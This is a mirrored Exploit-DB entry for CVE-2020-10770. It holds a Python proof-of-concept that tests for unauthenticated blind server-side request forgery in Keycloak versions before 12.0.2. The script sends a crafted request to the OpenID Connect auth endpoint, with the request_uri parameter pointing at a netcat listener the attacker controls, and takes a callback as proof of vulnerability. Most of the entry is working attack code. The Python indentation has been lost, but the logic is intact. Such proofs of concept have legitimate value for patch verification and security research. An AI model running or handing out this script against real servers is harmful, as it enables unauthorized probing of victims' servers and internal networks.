Keycloak 12.0.1 – ‘request_uri ‘ Blind Server-Side Request Forgery (SSRF) (Unauthenticated)

  • 作者: Mayank Deshmukh
    日期: 2021-10-13
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50405/
  • # Exploit Title: Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)
    # Date: 2021-10-09
    # Exploit Author: Mayank Deshmukh
    # Vendor Homepage: https://www.keycloak.org/
    # Software Link: https://www.keycloak.org/archive/downloads-12.0.1.html
    # Version: versions < 12.0.2
    # Tested on: Kali Linux
    # CVE : CVE-2020-10770
    
    #!/usr/bin/env python3
    
    import argparse, textwrap
    import requests
    import sys
    
    parser = argparse.ArgumentParser(description="-=[Keycloak Blind SSRF test by ColdFusionX]=-", formatter_class=argparse.RawTextHelpFormatter, 
    epilog=textwrap.dedent(''' 
    Exploit Usage : 
    ./exploit.py -u http://127.0.0.1:8080
    [^] Input Netcat host:port -> 192.168.0.1:4444
    ''')) 
    
    parser.add_argument("-u","--url", help="Keycloak Target URL (Example: http://127.0.0.1:8080)") 
    args = parser.parse_args()
    
    if len(sys.argv) <= 2:
    print (f"Exploit Usage: ./exploit.py -h [help] -u [url]")
    sys.exit()
    
    # Variables
    Host = args.url
    
    r = requests.session()
    
    def ssrf():
    headerscontent = {
    'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
     }
    hook = input("[^] Input Netcat host:port -> ")
    
    _req = r.get(f'{Host}/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{hook}', headers = headerscontent)
    return True
    
    if __name__ == "__main__":
    
    print ('\n[+] Keycloak Bind SSRF test by ColdFusionX \n ')
    try:
    if ssrf() == True:
    print ('\n[+] BINGO! Check Netcat listener for HTTP callback :) \n ')
    
    except Exception as ex:
    print('\n[-] Invalid URL or Target not Vulnerable')